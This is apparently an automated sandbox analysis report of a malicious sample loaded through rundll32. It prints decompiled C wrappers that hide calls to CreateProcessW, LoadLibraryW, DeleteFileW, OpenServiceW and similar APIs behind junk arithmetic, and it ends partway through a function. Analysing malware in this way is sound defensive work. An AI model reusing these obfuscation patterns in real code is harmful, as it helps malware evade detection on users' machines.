                                                                                                                                                                                      0x028291a6
                                                                                                                                                                                      0x028291ad
                                                                                                                                                                                      0x028291b4
                                                                                                                                                                                      0x028291bb
                                                                                                                                                                                      0x028291c2
                                                                                                                                                                                      0x028291d5
                                                                                                                                                                                      0x028291ef
                                                                                                                                                                                      0x028291f6

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNEL32(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 028291EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID: 31
                                                                                                                                                                                      • API String ID: 963392458-1099231638
                                                                                                                                                                                      • Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction ID: 775a192ffa9d5fc9abec3fd68a67c6015ed443b756d33fc8c0ca4db59c0bda41
                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: C231E376801258BBCF559FAACD05CDFBF75FB89710F108158FA14A2120C3728A60EF51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                      			E0281C38F(void* __ecx, int __edx, void* _a4, intOrPtr _a8, short* _a12) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				void* _t50;
                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_t65 = __edx;
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02818002(_t50);
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v36 = 0x617f6e;
                                                                                                                                                                                      				_v32 = 0x2c9f69;
                                                                                                                                                                                      				_v12 = 0x3d345c;
                                                                                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                                                                                      				_v12 = _v12 << 1;
                                                                                                                                                                                      				_v12 = _v12 + 0xffff1c15;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xfffbc300;
                                                                                                                                                                                      				_v8 = 0x1d3e99;
                                                                                                                                                                                      				_t61 = 0x3e;
                                                                                                                                                                                      				_v8 = _v8 / _t61;
                                                                                                                                                                                      				_v8 = _v8 + 0xcfea;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x5f2ca55f;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x5f2aa82f;
                                                                                                                                                                                      				_v16 = 0xf71959;
                                                                                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xac874e69;
                                                                                                                                                                                      				_v20 = 0x5ac786;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xe6acc0dd;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xe6fddbb7;
                                                                                                                                                                                      				E0282E399(_t61, _v8 % _t61, _t61, 0x1f1ae65e, 0x5e, 0x42b99377);
                                                                                                                                                                                      				_t59 = OpenServiceW(_a4, _a12, _t65); // executed
                                                                                                                                                                                      				return _t59;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x0281c396
                                                                                                                                                                                      0x0281c399
                                                                                                                                                                                      0x0281c39b
                                                                                                                                                                                      0x0281c39e
                                                                                                                                                                                      0x0281c3a1
                                                                                                                                                                                      0x0281c3a3
                                                                                                                                                                                      0x0281c3a8
                                                                                                                                                                                      0x0281c3ae
                                                                                                                                                                                      0x0281c3b2
                                                                                                                                                                                      0x0281c3b9
                                                                                                                                                                                      0x0281c3c0
                                                                                                                                                                                      0x0281c3c7
                                                                                                                                                                                      0x0281c3cb
                                                                                                                                                                                      0x0281c3ce
                                                                                                                                                                                      0x0281c3d5
                                                                                                                                                                                      0x0281c3dc
                                                                                                                                                                                      0x0281c3e8
                                                                                                                                                                                      0x0281c3ee
                                                                                                                                                                                      0x0281c3f1
                                                                                                                                                                                      0x0281c3f8
                                                                                                                                                                                      0x0281c3ff
                                                                                                                                                                                      0x0281c406
                                                                                                                                                                                      0x0281c40d
                                                                                                                                                                                      0x0281c411
                                                                                                                                                                                      0x0281c415
                                                                                                                                                                                      0x0281c41c
                                                                                                                                                                                      0x0281c423
                                                                                                                                                                                      0x0281c42a
                                                                                                                                                                                      0x0281c44a
                                                                                                                                                                                      0x0281c459
                                                                                                                                                                                      0x0281c45f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenServiceW.ADVAPI32(FFFBC300,E6FDDBB7,?,?,?,?,?,?,?,?,?), ref: 0281C459
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: OpenService
                                                                                                                                                                                      • String ID: \4=
                                                                                                                                                                                      • API String ID: 3098006287-2040901920
                                                                                                                                                                                      • Opcode ID: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
                                                                                                                                                                                      • Instruction ID: 6e1ab9a4e8d037bb75670ce38526779facac78310e7d577cf803f0a4d325e107
                                                                                                                                                                                      • Opcode Fuzzy Hash: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 402132B6D0020DEBDB04CFE5C90AADEBBB5FB00324F108189E425A6290C3BA5B55DF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                      			E02824CFD(void* __ecx, long __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                      				void* _t56;
                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                      				long _t62;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_t62 = __edx;
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02818002(_t46);
                                                                                                                                                                                      				_v20 = 0x7fa37e;
                                                                                                                                                                                      				_v20 = _v20 | 0x057bdedc;
                                                                                                                                                                                      				_v20 = _v20 + 0xffffffcc;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x057d9e34;
                                                                                                                                                                                      				_v8 = 0x65e94f;
                                                                                                                                                                                      				_t58 = 0x2a;
                                                                                                                                                                                      				_v8 = _v8 * 0x5b;
                                                                                                                                                                                      				_v8 = _v8 + 0xffffa5c0;
                                                                                                                                                                                      				_v8 = _v8 / _t58;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00d22f9e;
                                                                                                                                                                                      				_v16 = 0xf6ef89;
                                                                                                                                                                                      				_v16 = _v16 + 0x478;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x0b24101f;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x0bdb985c;
                                                                                                                                                                                      				_v12 = 0xb9bed2;
                                                                                                                                                                                      				_v12 = _v12 >> 5;
                                                                                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xb9b7d5de;
                                                                                                                                                                                      				E0282E399(_t58, _v8 % _t58, _t58, 0xa2449830, 0x264, 0x8babc312);
                                                                                                                                                                                      				_t56 = RtlAllocateHeap(_a20, _a4, _t62); // executed
                                                                                                                                                                                      				return _t56;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x02824d04
                                                                                                                                                                                      0x02824d07
                                                                                                                                                                                      0x02824d09
                                                                                                                                                                                      0x02824d0c
                                                                                                                                                                                      0x02824d0f
                                                                                                                                                                                      0x02824d12
                                                                                                                                                                                      0x02824d15
                                                                                                                                                                                      0x02824d17
                                                                                                                                                                                      0x02824d1c
                                                                                                                                                                                      0x02824d25
                                                                                                                                                                                      0x02824d2c
                                                                                                                                                                                      0x02824d30
                                                                                                                                                                                      0x02824d37
                                                                                                                                                                                      0x02824d44
                                                                                                                                                                                      0x02824d48
                                                                                                                                                                                      0x02824d4b
                                                                                                                                                                                      0x02824d5c
                                                                                                                                                                                      0x02824d5f
                                                                                                                                                                                      0x02824d66
                                                                                                                                                                                      0x02824d6d
                                                                                                                                                                                      0x02824d74
                                                                                                                                                                                      0x02824d7b
                                                                                                                                                                                      0x02824d82
                                                                                                                                                                                      0x02824d89
                                                                                                                                                                                      0x02824d8d
                                                                                                                                                                                      0x02824d91
                                                                                                                                                                                      0x02824daf
                                                                                                                                                                                      0x02824dbe
                                                                                                                                                                                      0x02824dc4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,B9B7D5DE,?,?,?,?,?,?,?,?,?,?,?), ref: 02824DBE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID: Oe
                                                                                                                                                                                      • API String ID: 1279760036-808228324
                                                                                                                                                                                      • Opcode ID: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
                                                                                                                                                                                      • Instruction ID: 3805a9adcce5ea767cbacbf9bcb1e28f4e4c3cfe4468f3d2f5b1addc30ce5485
                                                                                                                                                                                      • Opcode Fuzzy Hash: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
                                                                                                                                                                                      • Instruction Fuzzy Hash: 80211575C01219FBDF14DFA4C94A8DEBFB5FB00354F108588E92466250D7B58B14EF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                      			E028155C0(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _t44;
                                                                                                                                                                                      				int _t56;
                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                      				WCHAR* _t65;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_t65 = __edx;
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02818002(_t44);
                                                                                                                                                                                      				_v12 = 0xc09d41;
                                                                                                                                                                                      				_t58 = 0x5c;
                                                                                                                                                                                      				_v12 = _v12 / _t58;
                                                                                                                                                                                      				_v12 = _v12 + 0xffffef63;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe9e279a7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe9e62653;
                                                                                                                                                                                      				_v20 = 0xa2cc51;
                                                                                                                                                                                      				_t59 = 0x34;
                                                                                                                                                                                      				_v20 = _v20 / _t59;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x000b7ed2;
                                                                                                                                                                                      				_v8 = 0xd564b1;
                                                                                                                                                                                      				_v8 = _v8 >> 0xc;
                                                                                                                                                                                      				_v8 = _v8 + 0x176e;
                                                                                                                                                                                      				_v8 = _v8 | 0xf1e3b14c;
                                                                                                                                                                                      				_v8 = _v8 ^ 0xf1e4530b;
                                                                                                                                                                                      				_v16 = 0xd8623f;
                                                                                                                                                                                      				_v16 = _v16 * 0x37;
                                                                                                                                                                                      				_v16 = _v16 << 4;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xe7d235eb;
                                                                                                                                                                                      				E0282E399(_t59, _v20 % _t59, _t59, 0xa2449830, 0x246, 0x6ae2bc6b);
                                                                                                                                                                                      				_t56 = DeleteFileW(_t65); // executed
                                                                                                                                                                                      				return _t56;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x028155c7
                                                                                                                                                                                      0x028155ca
                                                                                                                                                                                      0x028155cc
                                                                                                                                                                                      0x028155ce
                                                                                                                                                                                      0x028155d3
                                                                                                                                                                                      0x028155e1
                                                                                                                                                                                      0x028155e6
                                                                                                                                                                                      0x028155eb
                                                                                                                                                                                      0x028155f2
                                                                                                                                                                                      0x028155f9
                                                                                                                                                                                      0x02815600
                                                                                                                                                                                      0x0281560a
                                                                                                                                                                                      0x02815610
                                                                                                                                                                                      0x02815613
                                                                                                                                                                                      0x0281561a
                                                                                                                                                                                      0x02815621
                                                                                                                                                                                      0x02815625
                                                                                                                                                                                      0x0281562c
                                                                                                                                                                                      0x02815633
                                                                                                                                                                                      0x0281563a
                                                                                                                                                                                      0x02815655
                                                                                                                                                                                      0x02815658
                                                                                                                                                                                      0x0281565c
                                                                                                                                                                                      0x0281566f
                                                                                                                                                                                      0x02815678
                                                                                                                                                                                      0x0281567e

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                      • String ID: S&
                                                                                                                                                                                      • API String ID: 4033686569-4232605156
                                                                                                                                                                                      • Opcode ID: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
                                                                                                                                                                                      • Instruction ID: 380a328d8cc0f6e489be90c91d4860ce4d048511cd0a1335387718232f0c692a
                                                                                                                                                                                      • Opcode Fuzzy Hash: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13113474D05318BBDB14DFA8C94A8CEBBB5FF90310F108099E429AB290D7B55B15CF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                                                      			E02817C11(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				unsigned int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                      				struct HINSTANCE__* _t44;
                                                                                                                                                                                      				WCHAR* _t47;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_t47 = __edx;
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E02818002(_t37);
                                                                                                                                                                                      				_v16 = 0xc57804;
                                                                                                                                                                                      				_v16 = _v16 + 0x7e2a;
                                                                                                                                                                                      				_v16 = _v16 << 3;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x062dce69;
                                                                                                                                                                                      				_v20 = 0xc0d373;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xd8d0ddee;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xd81819b4;
                                                                                                                                                                                      				_v12 = 0x9f362e;
                                                                                                                                                                                      				_v12 = _v12 + 0xfffffd91;
                                                                                                                                                                                      				_v12 = _v12 << 0xc;
                                                                                                                                                                                      				_v12 = _v12 >> 0xc;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x000a9d69;
                                                                                                                                                                                      				_v8 = 0xe543a4;
                                                                                                                                                                                      				_v8 = _v8 ^ 0xe0ed073d;
                                                                                                                                                                                      				_v8 = _v8 | 0x93b71955;
                                                                                                                                                                                      				_v8 = _v8 << 7;
                                                                                                                                                                                      				_v8 = _v8 ^ 0xdfad752a;
                                                                                                                                                                                      				E0282E399(__ecx, __edx, __ecx, 0xa2449830, 0x129, 0xf0e92e19);
                                                                                                                                                                                      				_t44 = LoadLibraryW(_t47); // executed
                                                                                                                                                                                      				return _t44;
                                                                                                                                                                                      			}










                                                                                                                                                                                      0x02817c18
                                                                                                                                                                                      0x02817c1b
                                                                                                                                                                                      0x02817c1d
                                                                                                                                                                                      0x02817c20
                                                                                                                                                                                      0x02817c21
                                                                                                                                                                                      0x02817c22
                                                                                                                                                                                      0x02817c27
                                                                                                                                                                                      0x02817c31
                                                                                                                                                                                      0x02817c38
                                                                                                                                                                                      0x02817c3c
                                                                                                                                                                                      0x02817c43
                                                                                                                                                                                      0x02817c4a
                                                                                                                                                                                      0x02817c51
                                                                                                                                                                                      0x02817c58
                                                                                                                                                                                      0x02817c5f
                                                                                                                                                                                      0x02817c66
                                                                                                                                                                                      0x02817c6a
                                                                                                                                                                                      0x02817c6e
                                                                                                                                                                                      0x02817c75
                                                                                                                                                                                      0x02817c7c
                                                                                                                                                                                      0x02817c83
                                                                                                                                                                                      0x02817c8a
                                                                                                                                                                                      0x02817c8e
                                                                                                                                                                                      0x02817cb1
                                                                                                                                                                                      0x02817cba
                                                                                                                                                                                      0x02817cc0

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 02817CBA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                      • String ID: *~
                                                                                                                                                                                      • API String ID: 1029625771-2567930604
                                                                                                                                                                                      • Opcode ID: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
                                                                                                                                                                                      • Instruction ID: b510ecdbe668511bd8aa16cb1997bf243f8725da27fd06ea1b9a743aa6606958
                                                                                                                                                                                      • Opcode Fuzzy Hash: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EA11F5B5D0121CBBDF14DFE9D90A49EBBB4FB00344F108598E826A2250D3B95B59DF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 6E9EC821
                                                                                                                                                                                        • Part of subcall function 6E9ECEAD: InitializeSListHead.KERNEL32(6EA2E4A0,6E9EC82B,6EA2AF60,00000010,6E9EC7BC,?,?,?,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8), ref: 6E9ECEB2
                                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E9EC88B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3231365870-0
                                                                                                                                                                                      • Opcode ID: b1bfd225bc7204c080f9746695eae44ddbd103a4671297f619b0071c4297550a
                                                                                                                                                                                      • Instruction ID: 2f1e77c4f5914f05a1de217eb78e058bae7a1e8742ac18ad0169b1311c5470a8
                                                                                                                                                                                      • Opcode Fuzzy Hash: b1bfd225bc7204c080f9746695eae44ddbd103a4671297f619b0071c4297550a
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7212932A483819EDB475BF486007DC3F699FA622DF154C19D6D12FAC1CB71C482CEA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                      			E02820207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				WCHAR* _t81;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_t81 = __edx;
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E02818002(_t54);
                                                                                                                                                                                      				_v36 = 0xa7e4f2;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t70 = 0x7b;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_v12 = 0x53fdc4;
                                                                                                                                                                                      				_t71 = 0x5a;
                                                                                                                                                                                      				_v12 = _v12 / _t70;
                                                                                                                                                                                      				_v12 = _v12 << 7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1fe8b09;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1ac8480;
                                                                                                                                                                                      				_v20 = 0x744728;
                                                                                                                                                                                      				_v20 = _v20 << 0xf;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x239bcee7;
                                                                                                                                                                                      				_v16 = 0xd5199;
                                                                                                                                                                                      				_v16 = _v16 + 0xffff5a50;
                                                                                                                                                                                      				_v16 = _v16 / _t71;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000f59f5;
                                                                                                                                                                                      				_v8 = 0xa57c1a;
                                                                                                                                                                                      				_v8 = _v8 | 0x119c25df;
                                                                                                                                                                                      				_v8 = _v8 + 0xffffdcc6;
                                                                                                                                                                                      				_t72 = 0x4f;
                                                                                                                                                                                      				_v8 = _v8 / _t72;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x003b1570;
                                                                                                                                                                                      				E0282E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
                                                                                                                                                                                      				_t68 = lstrcmpiW(_a8, _t81); // executed
                                                                                                                                                                                      				return _t68;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x0282020f
                                                                                                                                                                                      0x02820212
                                                                                                                                                                                      0x02820214
                                                                                                                                                                                      0x02820217
                                                                                                                                                                                      0x0282021a
                                                                                                                                                                                      0x0282021d
                                                                                                                                                                                      0x0282021f
                                                                                                                                                                                      0x02820224
                                                                                                                                                                                      0x02820232
                                                                                                                                                                                      0x02820235
                                                                                                                                                                                      0x02820238
                                                                                                                                                                                      0x02820239
                                                                                                                                                                                      0x0282023a
                                                                                                                                                                                      0x02820246
                                                                                                                                                                                      0x02820247
                                                                                                                                                                                      0x0282024c
                                                                                                                                                                                      0x02820250
                                                                                                                                                                                      0x02820257
                                                                                                                                                                                      0x0282025e
                                                                                                                                                                                      0x02820265
                                                                                                                                                                                      0x02820269
                                                                                                                                                                                      0x02820270
                                                                                                                                                                                      0x02820277
                                                                                                                                                                                      0x02820285
                                                                                                                                                                                      0x0282028a
                                                                                                                                                                                      0x02820291
                                                                                                                                                                                      0x02820298
                                                                                                                                                                                      0x0282029f
                                                                                                                                                                                      0x028202a9
                                                                                                                                                                                      0x028202af
                                                                                                                                                                                      0x028202b2
                                                                                                                                                                                      0x028202d5
                                                                                                                                                                                      0x028202e1
                                                                                                                                                                                      0x028202e8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 028202E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533471939.0000000002810000.00000040.00000010.sdmp, Offset: 02810000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2810000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: (Gt
                                                                                                                                                                                      • API String ID: 1586166983-558867117
                                                                                                                                                                                      • Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction ID: 5af1df4c0dc8ede9b57c4a3e6185433020ae642bb022b1e9300e5d5b338ac9f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction Fuzzy Hash: AC2178B5E00208FBEF04DFA8CD0A9DEBBB2FB44314F10C199E515AA250D7B65A50DF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                      			E02822D06(long __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, long _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, long _a40, long _a44) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                      				long _t76;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a44);
                                                                                                                                                                                      				_t76 = __ecx;
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E02818002(_t53);
                                                                                                                                                                                      				_v32 = 0xa61226;
                                                                                                                                                                                      				_v28 = 0;
                                                                                                                                                                                      				_v24 = 0;
                                                                                                                                                                                      				_v12 = 0x8b5566;
                                                                                                                                                                                      				_t68 = 0x4f;
                                                                                                                                                                                      				_v12 = _v12 * 0x16;
                                                                                                                                                                                      				_v12 = _v12 * 0x58;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x1db24b6c;
